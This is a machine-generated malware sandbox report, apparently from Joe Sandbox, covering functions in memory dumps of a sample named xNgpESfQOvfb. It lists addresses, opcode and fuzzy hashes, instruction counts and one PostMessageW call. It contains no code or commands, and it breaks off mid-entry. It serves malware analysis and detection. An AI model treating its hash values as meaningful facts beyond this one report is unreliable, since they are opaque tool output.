                        Function 07829587 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 078295E5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: eb5cc566284d273234348cf8bfabdb0f194478af97a459faedc704baf6591d7d
                        • Instruction ID: 00708488adeb4d4bd6d85cfc4f537892feb924cca1d9005468ee97ae57dfa2f2
                        • Opcode Fuzzy Hash: eb5cc566284d273234348cf8bfabdb0f194478af97a459faedc704baf6591d7d
                        • Instruction Fuzzy Hash: DA1103B5800349DFDB10CF9AC585BDEBBF8EB48320F10841AE559A7600C3B5A984CFA1
                        Function 07580040 Relevance: .8, Instructions: 751COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b82f3bfb9a3e3f9b361d4387dae95b562705a1a2d17c9fe5e0d26ae398fa6557
                        • Instruction ID: e681fdb312ccdb24e07fb4ead4d88957f661a2493eea2fd30d228afa5d62ce84
                        • Opcode Fuzzy Hash: b82f3bfb9a3e3f9b361d4387dae95b562705a1a2d17c9fe5e0d26ae398fa6557
                        • Instruction Fuzzy Hash: 4362C2B0E01B428BD7B46F7494883EE76D1BB45309F614A1FD1AEDB390DB349886CB16
                        Function 07580006 Relevance: .5, Instructions: 476COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30b388d57facd11b1703344a352c39a0cfdfd60a47a83168ce5dfb1693423fa0
                        • Instruction ID: 674d851ec759cbff1198922d3af318fb7a1368722957b6ac748c380aa9dd6680
                        • Opcode Fuzzy Hash: 30b388d57facd11b1703344a352c39a0cfdfd60a47a83168ce5dfb1693423fa0
                        • Instruction Fuzzy Hash: DD223BF0905B434BD7B46BA484843DE7AD0BB06219F714A5BC0FE9A395DB34988ACB49
                        Function 07582FD0 Relevance: .2, Instructions: 230COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1a98f34abe317d110a9f6763d67c1955f3d03f3d84da48cc01a5318a5e8c105
                        • Instruction ID: 1f869f855c9f5b45c873566ceb9a2031edf2d9ef3827c035360e3aab59179e98
                        • Opcode Fuzzy Hash: c1a98f34abe317d110a9f6763d67c1955f3d03f3d84da48cc01a5318a5e8c105
                        • Instruction Fuzzy Hash: AF9166753006048FD345FB78D8586AEB7E7EFC9300F118528E50A9B359EF38A946DB91
                        Function 0758AFAC Relevance: .2, Instructions: 196COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ef6401f85cd2f163987e292d9438fa5aea64775b01660487a8dda5db6ec8c7b
                        • Instruction ID: b6ace1c0dcc4a6e60cd3484166ad177538a2f263236b61abb03b376404280419
                        • Opcode Fuzzy Hash: 6ef6401f85cd2f163987e292d9438fa5aea64775b01660487a8dda5db6ec8c7b
                        • Instruction Fuzzy Hash: 5151B2B1A003199FDB44EFA9D8446AFBFEAFFC8210F10846AE505E7350DB349905CBA5
                        Function 075850AE Relevance: .2, Instructions: 167COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 125b7349a173830d8b5ebc86cfed65d25e063ced83713db7a083d9ebe1e9f07b
                        • Instruction ID: f01974d3d4c857b600731580b4c01e562d6e49cc1774d4a3375aa04dc31580f9
                        • Opcode Fuzzy Hash: 125b7349a173830d8b5ebc86cfed65d25e063ced83713db7a083d9ebe1e9f07b
                        • Instruction Fuzzy Hash: 6E515E35B001148FE754EBB4D854B6B7BE3FB98710F208029E606EB39ADE349C42DB91
                        Function 07584DC0 Relevance: .2, Instructions: 160COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22274a0968c0245f647abab9ec55aa5483b006c58fd106c27bf8657db6fa03ef
                        • Instruction ID: d8d5cb00ba0ef3221bc46aefaaf08b342ce9ff31cba49461127876575ba7e43f
                        • Opcode Fuzzy Hash: 22274a0968c0245f647abab9ec55aa5483b006c58fd106c27bf8657db6fa03ef
                        • Instruction Fuzzy Hash: E851A171B002068FDB15EB799C449BEBBFAFFC4260B14852AE425DB391DF309D0687A1
                        Function 07588DA8 Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47726300a618c496961bfe7b495beb85e1e4a50a522383d844febb6952662d70
                        • Instruction ID: 994fd942172c5c725a5d13c0c572b102ed6b5822063fbcbd12f6e5389582d447
                        • Opcode Fuzzy Hash: 47726300a618c496961bfe7b495beb85e1e4a50a522383d844febb6952662d70
                        • Instruction Fuzzy Hash: 6151EDB4E29209DFCB80EFA9D4809EDBBB5FB4E340F405856E456B7311D734A951CB50
                        Function 07588DB8 Relevance: .1, Instructions: 148COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54f2878233299a6e7b03ee6a16a3749187ded3ae570ac82402b8b64ce6dae464
                        • Instruction ID: 675c03a32adce58d114de654600491c9ba1782f43e8039c5caf553c28521a851
                        • Opcode Fuzzy Hash: 54f2878233299a6e7b03ee6a16a3749187ded3ae570ac82402b8b64ce6dae464
                        • Instruction Fuzzy Hash: 4251D9B4E2520ADFCB80EFA9D4849EDBBB5FB0E240F80585AE856B7311D734A851CB54
                        Function 07589931 Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6ddc4ec868a672aee2db201afd6526e213c620ad7cd4dfe609c95679d8fc9a7
                        • Instruction ID: b69647127bb2fa6b699f48861bf1bee3f3c845a48c4a48e885798496c1ba285f
                        • Opcode Fuzzy Hash: b6ddc4ec868a672aee2db201afd6526e213c620ad7cd4dfe609c95679d8fc9a7
                        • Instruction Fuzzy Hash: BB41C2B4D19259CFDB50EFA9D884AFDBBF9BB4A310F146415E40AB7251D734A941CF00
                        Function 0758FE38 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ec7544b77c5f663695049d230c10224eaea503434df6af7d2c5a2e2d4b64536
                        • Instruction ID: cac6179a1a89c9af4609f4ffbab2154614898e17dd69900cb6af39ebae014a66
                        • Opcode Fuzzy Hash: 4ec7544b77c5f663695049d230c10224eaea503434df6af7d2c5a2e2d4b64536
                        • Instruction Fuzzy Hash: 61410AB4E18209CFDB88DFA9D4406EEBBF6BB8E301F14D56AD419B3292D7344941CB60
                        Function 07588C68 Relevance: .1, Instructions: 121COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 490e7295f464e72dba3a797936947898c675d82c6ceb2646dc68ca4ac348873a
                        • Instruction ID: 79f07c9820766b6e0e745c70e7b428cf7919ccbf3d771a46fa000b26ae185ea9
                        • Opcode Fuzzy Hash: 490e7295f464e72dba3a797936947898c675d82c6ceb2646dc68ca4ac348873a
                        • Instruction Fuzzy Hash: B94152B4D29619CFD784EF5AD444AF9BBF9FF4E300F819895D019AB216D730A855CB00
                        Function 0758C14F Relevance: .1, Instructions: 117COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f42c29baa5d8b671ae9c935f61d40402754b3287c4df91a28360a708790d0c3
                        • Instruction ID: 321bbb6dd074f6053c9e1449c4e6329cc37de4e2742313a3a7e4ff507d7cd45b
                        • Opcode Fuzzy Hash: 2f42c29baa5d8b671ae9c935f61d40402754b3287c4df91a28360a708790d0c3
                        • Instruction Fuzzy Hash: 4F41B476A042159FCB42EFA8D9409DFBFB5FB89210F1440ABE046E7252D7345D46CBB1
                        Function 0758CE90 Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7315b7c5d390d85d25e0e8c98dc5ecdbad2aa8d2617bd50c355e10bc1cc77a4
                        • Instruction ID: b42d2d46f2111bca3d2efcee7f89cdc13cb03e339585141326ad1b5dbc19ce88
                        • Opcode Fuzzy Hash: b7315b7c5d390d85d25e0e8c98dc5ecdbad2aa8d2617bd50c355e10bc1cc77a4
                        • Instruction Fuzzy Hash: CD417DB1A001198FEB81EBA4D8516EFBBF6FBC8714F10806AE505E7389D7345D06DBA0
                        Function 07588C78 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df563fd082fa5352b925507fc8c7647376385acde38b61a4da069465d0c775ce
                        • Instruction ID: 9ea8936f95fcdcb53d77abecab3fbf9978553d5a7447957a93755e40b64bb884
                        • Opcode Fuzzy Hash: df563fd082fa5352b925507fc8c7647376385acde38b61a4da069465d0c775ce
                        • Instruction Fuzzy Hash: 654131B4D29619CFD784EF5AD444AF9BBF9FF4E300F819895D019AB216D730A954CB00
                        Function 07581068 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55fd75ecf0835ffe48e26421d9bdbd9f128b973ec873a45ee110ed605c14c8f3
                        • Instruction ID: c7cdc23ecb490c5df375d63c3b701ecb7afddfb511c3295d57449f0991091599
                        • Opcode Fuzzy Hash: 55fd75ecf0835ffe48e26421d9bdbd9f128b973ec873a45ee110ed605c14c8f3
                        • Instruction Fuzzy Hash: 4C21B276B106058FDB59EB38D85499D37E5AFC965071540AED505CB360DF31DC02CBA0
                        Function 0758B194 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55eff6b0a9e4db9e464b0b33ef9c477d87e6c1f259430fed3c7e2e3344e3bb5e
                        • Instruction ID: 4b42608056ecb5fe8ffc39f0bdeacf02da638cc44525f6dffa00daca11cdafc8
                        • Opcode Fuzzy Hash: 55eff6b0a9e4db9e464b0b33ef9c477d87e6c1f259430fed3c7e2e3344e3bb5e
                        • Instruction Fuzzy Hash: DB3102B1D01258DFEB60DF99D984BDEBBF8FB48720F24801AE409B7250C7B55845CBA1
                        Function 00F9D1B4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6f96317dd25e5bc9d4f667cfcefa889a8c72b017bb08d803d1e306cfafbc9fe
                        • Instruction ID: 8b854118a37d2e3c321ba6b458573990096c4a80922f4a05d98f51dd3f33be84
                        • Opcode Fuzzy Hash: c6f96317dd25e5bc9d4f667cfcefa889a8c72b017bb08d803d1e306cfafbc9fe
                        • Instruction Fuzzy Hash: FD212676904304EFEF05DF14D9C0B26BB65FB84324F30C5ADE9094B252C776D846DA61
                        Function 00F9D36C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f9a3a248f0357165ea408ccbf4be68f7ada5932704e91d413732035d9a5769f
                        • Instruction ID: 2089cbc7f287e25986d8615e08759cb8b572f0b28d84e3b073b742097aaab464
                        • Opcode Fuzzy Hash: 6f9a3a248f0357165ea408ccbf4be68f7ada5932704e91d413732035d9a5769f
                        • Instruction Fuzzy Hash: F321F276504204EFEF04DF18D9C0F26BBA5FB84324F34C56DE9094B296C77AD846DA62
                        Function 0758AF74 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d60f3c84f81959417c89bc18acb74578f37a997bb93fefc8571eccfc5e710440
                        • Instruction ID: f67fa0b49d5ba7b34b4a9378b71a27d17a0303fe573f867ca24f0d89424dc3d3
                        • Opcode Fuzzy Hash: d60f3c84f81959417c89bc18acb74578f37a997bb93fefc8571eccfc5e710440
                        • Instruction Fuzzy Hash: 5111B1B5609344AFDB45EB74DC556ADBBF8EF46200B1485EBE805D7242EA309D06CB32
                        Function 0758D690 Relevance: .1, Instructions: 67COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 280db7e6afbe14e5329273fed8f7c49cd933c7a9b36e2c51eb7319a51a852582
                        • Instruction ID: 56e312bf8f39ce5bcafd3dbbb7910686653a64b30c5d001f7518c8fd65daf0e0
                        • Opcode Fuzzy Hash: 280db7e6afbe14e5329273fed8f7c49cd933c7a9b36e2c51eb7319a51a852582
                        • Instruction Fuzzy Hash: C321E4B5B047489FD705FB65C810B9A7BB6FF8A300F1180A6D506AB2A6DE35DC01CB81
                        Function 0758ACA8 Relevance: .1, Instructions: 67COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8f4e9bec2f013c2a35d7859cf1dccfae0a30e5ba7268911a663d45931f2dda3
                        • Instruction ID: a9876acb4327538bea493ed263d41efd44ec142d9cf573fb824c1fafa089e91b
                        • Opcode Fuzzy Hash: c8f4e9bec2f013c2a35d7859cf1dccfae0a30e5ba7268911a663d45931f2dda3
                        • Instruction Fuzzy Hash: D5310EB0C00348DFDB60EF99C988BCEBBF8BB48710F24801AE409BB250C7B56845CB91
                        Function 0758C7E0 Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 18bac68992ee68b3e4cfbf687f282c24730c24a1a9f8fe891ffa56388b9e1e48
                        • Instruction ID: 438c0d663e6a75f6a2d38e0b6f1d608650eb706a16afd4d824f5f19668b93d4b
                        • Opcode Fuzzy Hash: 18bac68992ee68b3e4cfbf687f282c24730c24a1a9f8fe891ffa56388b9e1e48
                        • Instruction Fuzzy Hash: 182107B58003499FDB10DFA9D884ACEBFF4FF49320F14845AE915A7211D374A954CFA5
                        Function 0758AFE1 Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10bea0e2d8d4160360c08317e52b642f72d1ebdb25121908a0ecc780d9003d85
                        • Instruction ID: 0784d5528627636dff09d9f4b6a685ef0ee20ada32e577c1e95913bb91446a37
                        • Opcode Fuzzy Hash: 10bea0e2d8d4160360c08317e52b642f72d1ebdb25121908a0ecc780d9003d85
                        • Instruction Fuzzy Hash: BC11E7B5B002469F8B51EB799C449FFBBFAFFC4260714852AE425E7340EF30990687A1
                        Function 075811C9 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8547c934f2a131bbfe919594b61b4e1ab0fa383ed58aaa42adb410877f7e6b01
                        • Instruction ID: e58513428e5db98ff182819bc2d167454cc80425b9ca47b0a996e42199caa499
                        • Opcode Fuzzy Hash: 8547c934f2a131bbfe919594b61b4e1ab0fa383ed58aaa42adb410877f7e6b01
                        • Instruction Fuzzy Hash: 35210775A10219CFCB55EBA4C858AED7BB2BF89300F1504A9D802BB361CB359C02CF60
                        Function 075811D8 Relevance: .1, Instructions: 61COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 035c692b3e3b86b207182d8c59c4977f7e6c18ffdfa5b228fc705309c109180a
                        • Instruction ID: a5c20b733a4de900425ccbcb6b393418c007bac2d71a270fd4317d988fc6bde7
                        • Opcode Fuzzy Hash: 035c692b3e3b86b207182d8c59c4977f7e6c18ffdfa5b228fc705309c109180a
                        • Instruction Fuzzy Hash: 0F21E975A10218CFCB54EF68C858AEDB7B2FF88310F514469E902BB3A0CB359D01CB61
                        Function 0758AB08 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24bacc67e9568b949a991fb31c19be374f1346a57361a0b4e69f06eecdffd515
                        • Instruction ID: 19612d609b5c68250ca61ea6544e3a9f219a552ebb126057b432fd922d6712ea
                        • Opcode Fuzzy Hash: 24bacc67e9568b949a991fb31c19be374f1346a57361a0b4e69f06eecdffd515
                        • Instruction Fuzzy Hash: 45111F71B0125A8BDB94EBB998106EEB7F6BB89211B10846AC544E7344EF318D12CBA1
                        Function 0758AFBC Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f26d43451c96251a70ac8280aae9170a12c46e7db1b755c3cf949f2adae91aba
                        • Instruction ID: 24b019a3c4b5ca91c0d65dc46fcecd53bdbc619e42dc25879e6e776a3c629460
                        • Opcode Fuzzy Hash: f26d43451c96251a70ac8280aae9170a12c46e7db1b755c3cf949f2adae91aba
                        • Instruction Fuzzy Hash: 3F21F2B69003499FDB10DF9AD884ADEBBF4FB48320F10846AE919B7210D374A954CFA1
                        Function 075894F2 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da98a6ef496b1e70907a5a75f65b0fbb115c7472d963f28462ef3f35b5b7fc9c
                        • Instruction ID: 0368f7168eae9d4f5585d01c1c675392f0bc99cc50ac23a9deed74274dce6566
                        • Opcode Fuzzy Hash: da98a6ef496b1e70907a5a75f65b0fbb115c7472d963f28462ef3f35b5b7fc9c
                        • Instruction Fuzzy Hash: BA11C1B4D042488BDB44CF66C4447F9BBBABF8A300F14946AC46A27252DB716405CB80
                        Function 00F9D1AF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                        • Instruction ID: e561644e97762241e6b739c380709647cacc392b2f8a75daa29d7ec4a43597b8
                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                        • Instruction Fuzzy Hash: 9C119D75904684DFDB05CF10D9C4B15BBA1FB84328F24C6AAD8494B656C33AD84ADBA1
                        Function 00F9D367 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                        • Instruction ID: 1d51eb760f0fa4743b00c8ff576682ad071af62a0c198168c93dbeec6d9aa097
                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                        • Instruction Fuzzy Hash: 9F11BB76904280CFDB01CF14D5C4B15BBA1FB84328F24C6A9D8094B696C33AE84ACF62
                        Function 07589479 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a1a10f847a1a2b546ef5cd6e283ee54d80777cb5f6be1b7b6098ab7dbd698d8
                        • Instruction ID: 2ee7e4f0f9434d3e1e0bc60bcca5b0a9f770554ef764bcb92bd97950646a5914
                        • Opcode Fuzzy Hash: 4a1a10f847a1a2b546ef5cd6e283ee54d80777cb5f6be1b7b6098ab7dbd698d8
                        • Instruction Fuzzy Hash: F2016DB5E083848BD744DBA6C4047FEBBBABB8A300F00C466C41967252D7755549CF90
                        Function 07582F18 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 321e351b51abdfef64f796898d7b629e673e6986507eac4008bf0c3beafd9fcb
                        • Instruction ID: 51c4dcb83c26c82618ecb6c1c7ad7f995973629591d85d198adc11f55616ce79
                        • Opcode Fuzzy Hash: 321e351b51abdfef64f796898d7b629e673e6986507eac4008bf0c3beafd9fcb
                        • Instruction Fuzzy Hash: 60014230B08314DFD7026A69E805766BF26FFCA310F04C163E9189B393CA75C852C3A1
                        Function 0758D681 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56ba9aa75c06d0bce52db9ee6dc908d7a1aa90051a41858dc69c880598794d96
                        • Instruction ID: f91a188b1c9fc976caa42687151db1694a1a6ad1dbec701da49fe933d4c9d8a4
